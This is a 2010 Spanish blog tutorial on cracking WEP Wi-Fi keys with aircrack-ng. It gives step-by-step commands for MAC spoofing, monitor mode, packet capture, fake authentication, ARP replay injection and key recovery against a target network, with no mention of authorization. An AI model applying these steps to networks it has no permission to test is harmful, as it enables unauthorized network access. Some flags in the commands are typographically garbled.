jueves, 18 de febrero de 2010

Obtener claves WEP con ayuda de Aircrack-ng

Aircrack-ng es una suite de programas para la auditoría de redes inalámbricas.


Es posible obtener las claves cifradas WEP y WPA/WPA2-PSK siendo las claves WEP las más fáciles de descifrar y por error para el usuario de una conexión la más común.

Todos los comandos e información está sacada de la web oficial de Aircrack-ng.org.


¿Qué necesito para usar Aircrack-ng?.

Es necesario tener una tarjeta de red inalámbrica compatible con airodump-ng (ver lista de compatibilidad). Airodump-ng es el programa con el que se capturan los paquetes cifrados de la red atacada para poder descifrar la clave.

Los programas en cuestión que trae Aircrack-ng así como macchanger.


¿Qué es recomendado tener para usar Aircrack-ng?


Debido a que Aireplay-ng solo es compatible con el sistema operativo GNU/Linux, si queremos poder inyectar paquetes es necesario que usemos alguna distribución GNU/Linux. Hay que mencionar que hay distribuciones específicas que contienen ya Aircrack-ng así como más programas y utilidades y driver parcheados para inyectar paquetes. Tales distribuciones son Live CD o Live USB, ésto significa que no es necesario instalarlos en nuestra máquina, basta con grabarlos en un CD o USB e iniciar la máquina arrancando desde ellos. Algunas de estas distribuciones son: Backtrack, WifiSlax, WifiWay

¿Cómo me instalo Aircrack-ng y Macchanger si no quiero usar Live CD o Live USB?


Aircrack-ng Downloads

En Ubuntu:

sudo apt-get install aircrack-ng

Para instalar Macchanger, puedes pasarte por su web

Macchanger Downloads

En Ubuntu:

sudo apt-get install macchanger

Ya que tenemos todo preparado: Tarjeta compatible con airodump-ng y aireplay-ng y macchanger, os voy a dejar unos comando básicos para hacer un ataque a una red con encriptacion WEP con clientes asociados.

Todos los comandos e información está sacada de la web oficial de Aircrack-ng.org.

Primero abrimos una terminal (consola) y entramos como superusuario(root) para tener privilegios. Este comando varía según la distribución GNU/Linux que usemos.

sudo su

*** Preparación de la tarjeta

airmon-ng

>>interfaz inalámbrico: nos devuelve por pantalla el nombre de la tarjeta red que tenemos (wifi0, wlan0, ath0, ra0,…). Yo usaré ra0 por tener una ralink 2500.

airmon-ng stop ra0

>>monitor mode disable: nos devuelve que nuestra tarjeta tiene el modo monitor desactivado.

ifconfig ra0 down

>>tarjeta de red desactiva: no sale nada por pantalla.

macchanger –mac 00:11:22:33:44:55 ra0

>>Current mac: xx:xx:xx:xx:xx:xx Fake mac:00:11:22:33:44:55: nos da la mac original y la falsa que hemos nos hemos asignado para luego poder inyectar paquetes.

airmon-ng start ra0

>>monitor mode enable: Ponemos nuestra tarjeta en modo monitor(necesario para poder capturar paquetes)

*** Escaneo de redes y clientes asociados

airodump-ng ra0

>>redes y clientes disponibles: nos sale una tabla con las redes disponibles con toda la información como canal, nombre, calidad de señal, tipo de encriptación, etc.. y los clientes que están conectadas a las redes.

Paramos la ejecución del comando pulsando “Control+C”, o cerrando y abriendo otra terminal.

airodump-ng –c NumeroDeCanal –w ArchivoDeCapturas –bssid BBSID ra0

Por ejemplo una red en canal 11 con BSSID 00:01:02:03:04:C1 que hemos detectado: airodump-ng -c 11 -w capturaswifi - - bssid 00:01:02:03:04:C1

>>Capturando paquetes…: nos va saliendo la captura de paquetes así como la señal de la red y los clientes asociados. Dejamos recogiendo paquetes, por lo que ESTA TERMINAL NO LA CIERRES!!!


Abre una nueva terminal (consola) con privilegios de superusuario(root) como antes.

aireplay-ng -1 0 –a BSSID –h 00:11:22:33:44:55 –e ESSID ra0

>>Association successful: Con esto hacemos una autenticación falsa en el router. Para ello en el comando se necesita la BSSID de la red atacada, la mac falsa que nos pusimos (00:11:22:33:44:55) y el nombre que tiene la red atacada, es decir, la ESSID. Es importante que nos salga el Association Succesful, de lo contrario no podremos inyectar paquetes. Por ejemplo: aireplay-ng 1 0 -a 00:01:02:03:04:05 -h 00:11:22:33:44:55 -e WIFI_RED ra0.

aireplay-ng -3 –b BSID –h 00:11:22:33:44:55 ra0

>>Envío de paquetes…: nos saldrá por pantalla que se están mandando paquetes, para que la inyección sea correcta deben aparecer paquetes ARP recogidos. Por ejemplo: aireplay-ng -3 -b 00:01:02:03:04:05 -h 00:11:22:33:44:55 ra0. Ahora dejamos que siga inyectando paquetes, por tanto NO CIERRES ESTA TERMINAL!!!

*** Crackeo WEP

Para poder obtener la clave WEP es necesario tener un mínimo de paquetes recogidos. El número de paquetes dependerá de la longitud que tenga la clave WEP. Como mínimo recomiendo que empecéis a intentar conseguir la clave a partir de 25.000 por si la clave es de las cortas.

Cuando veamos en la terminal que dejamos el airodump-ng recogiendo paquetes que tenemos más de 25.000 #data recogidos.

Abre una nueva terminal (consola) con privilegios de superusuario(root) como antes.

aircrack-ng –b BSSID ArchivoDeCapturas.cap

>>Clave WEP encontrada/no encontrada: El programa empezará a descifrar los paquetes recogidos, y cuando finalice nos dirá si ha encontrado la clave o no. Si no la encuentra nos recomienda que lo volvamos a intentar superados “X” paquetes recogidos. Si la encuentra nos saldrá: KEY FOUND! y la clave en hexadecimal normalmente.

Fuente:

www.aircrack.org


Saludos,


David Loor M.

No hay comentarios:

Publicar un comentario